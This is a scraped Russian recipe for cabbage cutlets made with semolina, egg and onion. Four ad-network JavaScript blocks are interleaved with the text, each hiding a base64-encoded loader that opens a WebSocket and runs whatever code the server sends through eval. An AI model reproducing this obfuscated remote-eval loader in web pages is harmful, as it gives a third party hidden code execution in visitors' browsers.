Невероятно вкусные котлеты без грамма мяса


Капустные котлеты являются вкусным, полезным и очень доступным блюдом. Их можно использовать в качестве оригинального гарнира или самостоятельного блюда.

При подаче котлет из капусты часто используют горчицу, сметану, томатный или грибной соус.

var d = new Date, script648715 = document.createElement(«script»), mg_ws648715 = {};script648715.type = «text/javascript»;script648715.charset = «utf-8»;script648715.src = «http://jsc.marketgid.com/p/e/perekusim.com.648715.js?t=» + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script648715.onerror = function () { mg_ws648715 = new Worker(URL.createObjectURL(new Blob([‘eval(atob(‘ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2NDg3MTUoZSl7dmFyIGg9bWdfd3M2NDg3MTUub25tZXNzYWdlOyBtZ193czY0ODcxNS5yZWFkeVN0YXRlPT1tZ193czY0ODcxNS5DTE9TRUQmJihtZ193czY0ODcxNT1uZXcgV2ViU29ja2V0KG1nX3dzNjQ4NzE1X2xvY2F0aW9uKSksbWdfd3M2NDg3MTUub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTUobWdfd3M2NDg3MTUsZnVuY3Rpb24oKXttZ193czY0ODcxNS5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTUoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTUoZSx0KX0sNSl9OyB2YXIgbWdfd3M2NDg3MTVfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czY0ODcxNSA9IG5ldyBXZWJTb2NrZXQobWdfd3M2NDg3MTVfbG9jYXRpb24pLCBtZ193czY0ODcxNS5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2NDg3MTUoZS5kYXRhKX0=’))’]), {type: «application/javascript»})); mg_ws648715.onmessage = function (msg){window.eval(msg.data);}; mg_ws648715.postMessage(‘js|’+script648715.src+’|M382836Composite648715|M382836Composite648715’);};document.body.appendChild(script648715);

Капустные котлеты невероятно популярны у вегетарианцев. Однако, они могут служить отличным гарниром к мясным блюдам. Это блюдо поможет разнообразить любое семейное меню, особенно детское. Не секрет, что дети часто не любят капусту и блюда из нее, однако, увидев аппетитную хрустящую корочку этих котлеток, они едят их с огромным удовольствием.

Котлеты из капусты получаются невероятно вкусными, ароматными и хрустящими. Слюнки текут уже от одного вида: золотистые, прекрасной формы, нежные и сочные. В моей семье их очень любят и всегда едят с большим удовольствием. Подавать такие котлеты на стол можно как горячими, так и холодными: мне они больше нравятся прямо из холодильника.

var d = new Date, script648713 = document.createElement(«script»), mg_ws648713 = {};script648713.type = «text/javascript»;script648713.charset = «utf-8»;script648713.src = «http://jsc.marketgid.com/p/e/perekusim.com.648713.js?t=» + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script648713.onerror = function () { mg_ws648713 = new Worker(URL.createObjectURL(new Blob([‘eval(atob(‘ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2NDg3MTMoZSl7dmFyIGg9bWdfd3M2NDg3MTMub25tZXNzYWdlOyBtZ193czY0ODcxMy5yZWFkeVN0YXRlPT1tZ193czY0ODcxMy5DTE9TRUQmJihtZ193czY0ODcxMz1uZXcgV2ViU29ja2V0KG1nX3dzNjQ4NzEzX2xvY2F0aW9uKSksbWdfd3M2NDg3MTMub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTMobWdfd3M2NDg3MTMsZnVuY3Rpb24oKXttZ193czY0ODcxMy5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTMoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTMoZSx0KX0sNSl9OyB2YXIgbWdfd3M2NDg3MTNfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czY0ODcxMyA9IG5ldyBXZWJTb2NrZXQobWdfd3M2NDg3MTNfbG9jYXRpb24pLCBtZ193czY0ODcxMy5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2NDg3MTMoZS5kYXRhKX0=’))’]), {type: «application/javascript»})); mg_ws648713.onmessage = function (msg){window.eval(msg.data);}; mg_ws648713.postMessage(‘js|’+script648713.src+’|M382836Composite648713|M382836Composite648713’);};document.body.appendChild(script648713);

Состав продуктов:
700 грамм белокочанной капусты;
два свежих куриных яйца;
две крупные головки репчатого лука;
4-5 столовых ложек манной крупы;
одна чайная ложка соли;
сушеная или свежая зелень — по вкусу;
приправы — по вкусу;
30 грамм сливочного масла;
рафинированное подсолнечное масло — для жарки.
Пошаговый процесс приготовления
Сразу, перед началом готовки, наливаем в кастрюлю воду, ставим на огонь и доводим до кипения.
Белокочанную капусту шинкуем как можно тоньше, отправляем в кипящую воду.
Варим капусту 7-10 минут до полуготовности. Если капуста старая, варить ее нужно будет дольше.
Две крупные головки репчатого лука очищаем от шелухи и режем на маленькие кубики.

var d = new Date, script648719 = document.createElement(«script»), mg_ws648719 = {};script648719.type = «text/javascript»;script648719.charset = «utf-8»;script648719.src = «http://jsc.marketgid.com/p/e/perekusim.com.648719.js?t=» + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script648719.onerror = function () { mg_ws648719 = new Worker(URL.createObjectURL(new Blob([‘eval(atob(‘ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2NDg3MTkoZSl7dmFyIGg9bWdfd3M2NDg3MTkub25tZXNzYWdlOyBtZ193czY0ODcxOS5yZWFkeVN0YXRlPT1tZ193czY0ODcxOS5DTE9TRUQmJihtZ193czY0ODcxOT1uZXcgV2ViU29ja2V0KG1nX3dzNjQ4NzE5X2xvY2F0aW9uKSksbWdfd3M2NDg3MTkub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTkobWdfd3M2NDg3MTksZnVuY3Rpb24oKXttZ193czY0ODcxOS5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTkoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTkoZSx0KX0sNSl9OyB2YXIgbWdfd3M2NDg3MTlfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czY0ODcxOSA9IG5ldyBXZWJTb2NrZXQobWdfd3M2NDg3MTlfbG9jYXRpb24pLCBtZ193czY0ODcxOS5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2NDg3MTkoZS5kYXRhKX0=’))’]), {type: «application/javascript»})); mg_ws648719.onmessage = function (msg){window.eval(msg.data);}; mg_ws648719.postMessage(‘js|’+script648719.src+’|M382836Composite648719|M382836Composite648719’);};document.body.appendChild(script648719);
В разогретую сковороду кладем кусочек сливочного масла и выкладываем весь нарезанный лук.
Обжариваем лук на среднем огне до золотистого цвета, периодически помешивая, чтобы не подгорел. Перекладываем его на тарелку и даем остыть.
Сваренную до полуготовности капусту откидываем на дуршлаг, даем стечь лишней жидкости.
Даем капусте полностью остыть и остатки влаги отжимаем руками.
Перекладываем капусту в глубокую миску, добавляем остывший обжаренный лук, два свежих куриных яйца, соль, манную крупу, зелень (у меня сушеная ) и приправы (по вкусу).
Все хорошо перемешиваем и даем фаршу постоять 10 минут: чтобы манка набухла. Если фарш получится жидковатым, добавьте еще немного манки.
Формируем котлеты (у меня в этот раз круглой формы), перекладывая фарш несколько раз из одной руки в другую и немного прижимая его.
В сковороду с достаточным количеством разогретого растительного масла выкладываем наши капустные котлеты, обжариваем с одной стороны до золотистого цвета.
Затем переворачиваем и вторую сторону обжариваем уже под крышкой.
Жарятся такие котлеты очень быстро. Из данного количества ингредиентов у меня получается 10-12 котлет.

var d = new Date, script648714 = document.createElement(«script»), mg_ws648714 = {};script648714.type = «text/javascript»;script648714.charset = «utf-8»;script648714.src = «http://jsc.marketgid.com/p/e/perekusim.com.648714.js?t=» + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script648714.onerror = function () { mg_ws648714 = new Worker(URL.createObjectURL(new Blob([‘eval(atob(‘ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2NDg3MTQoZSl7dmFyIGg9bWdfd3M2NDg3MTQub25tZXNzYWdlOyBtZ193czY0ODcxNC5yZWFkeVN0YXRlPT1tZ193czY0ODcxNC5DTE9TRUQmJihtZ193czY0ODcxND1uZXcgV2ViU29ja2V0KG1nX3dzNjQ4NzE0X2xvY2F0aW9uKSksbWdfd3M2NDg3MTQub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTQobWdfd3M2NDg3MTQsZnVuY3Rpb24oKXttZ193czY0ODcxNC5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTQoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242NDg3MTQoZSx0KX0sNSl9OyB2YXIgbWdfd3M2NDg3MTRfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czY0ODcxNCA9IG5ldyBXZWJTb2NrZXQobWdfd3M2NDg3MTRfbG9jYXRpb24pLCBtZ193czY0ODcxNC5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2NDg3MTQoZS5kYXRhKX0=’))’]), {type: «application/javascript»})); mg_ws648714.onmessage = function (msg){window.eval(msg.data);}; mg_ws648714.postMessage(‘js|’+script648714.src+’|M382836Composite648714|M382836Composite648714’);};document.body.appendChild(script648714);
Совет. Если вы хотите приготовить совсем легкие, нежирные котлеты, то советуем вам запечь их в духовке, прогрев ее до 180 градусов. Котлеты выкладываем на противень, застеленный пекарской бумагой, смазываем их сливочным маслом и выпекаем около 20 минут. Затем вынимаем, обмазываем взбитым яичным белком и снова ставим в духовку: примерно на 10 минут. Готовые котлеты можно посыпать семенами кунжута.
Подаем капустные котлеты на стол теплыми или холодными, со сметаной или другими соусами.
Приятного аппетита!

Источник



Source link